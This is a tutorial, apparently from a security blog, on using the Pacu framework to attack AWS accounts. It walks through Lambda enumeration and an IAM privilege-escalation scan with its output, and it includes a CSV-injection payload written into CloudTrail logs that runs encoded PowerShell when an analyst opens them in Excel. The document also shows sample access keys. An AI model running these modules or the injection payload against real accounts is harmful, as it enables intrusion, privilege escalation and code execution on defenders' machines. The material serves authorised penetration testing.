AWS Penetration Testing – Pacu exploitation framework

Pacu is an open-source AWS exploitation framework, designed for offensive security testing against AWS environments. Built and maintained by Rhino Security Labs, Pacu allows penetration testers to exploit configuration flaws within an AWS account.

The default modules offer multiple different paths, these include service enumeration, user privilege escalation, backdooring of IAM users, attacking vulnerable Lambda functions, and much more.

Getting started with Pacu

Pacu can be downloaded with pip, however, other options such as Docker or cloning the Github repository are also available. As soon as the installation is complete Pacu can be run using the pacu command.

terminal$ pacu

Found existing sessions:
  [0] New session
  [1] testing
Choose an option:

If this is the first time Pacu has been run there will be no pre-existing sessions. When prompted, a new session will need to be started, this can be done by typing “0” followed by a session name. Pacu will load into the specified session after which the AWS keys can be set. To set AWS keys users can make use of the set_keys command.

What would you like to name this new session? Jessies-Bookstore
Session Jessies-Bookstore created.

Pacu (Jessies-Bookstore:No Keys Set) > set_keys
Setting AWS Keys...

Key alias [None]: arcan3
Access key ID [None]: JSG738SJ2GD5992HSG
Secret access key [None]: Hpow268S/jshd7GSJ8627suHJHSGTS792HS7kjhbi9LCNSVkspo
Session token (Optional - for temp AWS keys only) [None]: 

Keys saved to database.

Pacu (Jessies-Bookstore:arcan3) > 

If the AWS keys have previously been used with the AWS command line tool then they can be imported using the “import_keys” command.

Once Pacu has been configured a full breakdown of the usage can be found using the classic help command. For now, the main commands which we’ll be looking at are list, run and data.

Service enumeration using Pacu modules

Pacu offers a wealth of modules to help speed up both the enumeration and exploitation process. With the list command, Pacu will provide a complete breakdown of all available modules. For readability, this list has been reduced but more information can be found on the official Wiki.

[more modules available]

  iam__enum_action_query
  iam__enum_permissions
  iam__enum_users_roles_policies_groups
  iam__get_credential_report
  inspector__get_reports
  lambda__enum
  lightsail__enum
  organizations__enum
  rds__enum

Pacu (Jessies-Bookstore:arcan3) > run lambda__enum

Each module can be run using either run followed by the module name or exec and then the module name. If the current user has permission to perform those actions then Pacu would be able to enumerate and report back.

[lambda__enum] MODULE SUMMARY:

  1 functions found in us-east-1. View more information in the DB 

Pacu (Jessies-Bookstore:arcan3) >

In this example, Pacu has been able to enumerate the AWS regions to find a single Lambda function. Only a small amount of information is initially displayed back. However, the full findings can be viewed with Pacu’s data command followed by the service name. An example of this can be seen below.

Pacu (Jessies-Bookstore:arcan3) > data lambda
{
  "AccountLimit": {
    "CodeSizeUnzipped": 262144000,
    "CodeSizeZipped": 52428800,
    "TotalCodeSize": 80530636800,
  },
  "Functions": [
    {
      "Architectures": [
        "x86_64"
      ],
      "Code": {
        "Location": "https://prod-iad-c1-djus...",
        "RepositoryType": "S3"
      },
      "FunctionArn": "arn:aws:lambda:us-east-1:00055155117:function:stock-checker",
      "FunctionName": "stock-checker",
      "Region": "us-east-1",
      "Role": "arn:aws:iam::00055155117:role/service-role/stock-checker-role-pv66rywu",
      "Runtime": "ruby3.2",
    }
  ]
}

Within the provided data it appears that there is a lambda function called “stock-checker”, this is built using Ruby. What’s also interesting is the “Location”. Using curl or any other browser for that matter, the URL could be visited and the source files or binaries downloaded for further review.

Privilege escalation with Pacu

By default, Pacu comes with two modules for privilege escalation, these are iam__privesc_Scan and cfn__resource_injection. Using the iam__privesc_scan, Pacu will attempt to find and abuse IAM permissions to escalate privileges within the AWS environment.

This module scans for permission misconfigurations to see where privilege escalation will be possible. Any available attack paths found will be presented to the user and executed if chosen.

Pacu (Jessies-Bookstore:arcan3) > run iam__privesc_scan
iam__privesc_scan] Successfully created CodeStar project ysfetbicvs. The next step could take up to a minute, please wait...
[iam__privesc_scan] Successfully associated the IAM user with the CodeStar project ysfetbicvs. The user should now have a managed policy named "CodeStar_ysfetbicvs_Owner" that will grant some additional privileges.
[iam__privesc_scan]     At the time of writing this exploit, the permissions of that policy would look like this:

        {
            "Sid": "3",
            "Effect": "Allow",
            "Action": [
                "codestar:*UserProfile",
                "iam:GenerateCredentialReport",
                "iam:GenerateServiceLastAccessedDetails",
                "iam:CreateAccessKey",
                "iam:UpdateAccessKey",
                "iam:DeleteAccessKey",
                "iam:UpdateSSHPublicKey",
                "iam:UploadSSHPublicKey",
                "iam:DeleteSSHPublicKey",
                "iam:CreateServiceSpecificCredential",
                "iam:UpdateServiceSpecificCredential",
                "iam:DeleteServiceSpecificCredential",
                "iam:ResetServiceSpecificCredential",
                "iam:Get*",
                "iam:List*"
            ],
            "Resource": [
                "arn:aws:iam::YOUR-ACCOUNT-ID:user/${aws:username}"
            ]
        }

Once the module has finished, it reveals that the user has permission to create CodeStar projects and assign ownership. This is interesting as when ownership is assigned to a project it allows the owner additional privileges across AWS, some of these privileges are displayed in the module output above.

Lateral movement and persistence with Pacu

Depending on the scope of the penetration test you may wish to move laterally or attempt to persist within the organisation’s network. Pacu offers multiple ways to move laterally but the module which will be used for this demonstration is cloudtrail__csv_injection.

The cloudtrail__cvs_injection module allows for a payload to get written to the CloudTrail logs. When the logs are downloaded and viewed locally with Microsoft Excel it triggers the provided payload. As the payload can allow for operating system commands, further organisational access can be achieved, in this instance, the payload is an encoded PowerShell command.

Pacu (Jessies-Bookstore:arcan3) > run cloudtrail__csv_injection --payload "=cmd|'powershell.exe -Enc uygug987y8qginuygIG7o8nGn7go87oi86g2293iPOSK27iy...'!"

When opening the exported CSV file, the user would be presented with a “Do you trust this file” pop-up, as the file is from their own AWS account they’ll most likely click yes and trigger our payload.

Depending on the payload, the consequences can vary. However, as this gives an attacker the ability to execute operating system commands this could result in further infrastructure compromise away from AWS.

Conclusion

While we’ve only scratched the surface with Pacu it’s clear that this is a great tool which warrants further investigation. It’s highly recommended that you install Pacu and take the time to learn the different modules to ensure you’re able to fully utilise it in the future.




Up Next “Finishing Up”

Spread the love

Tags: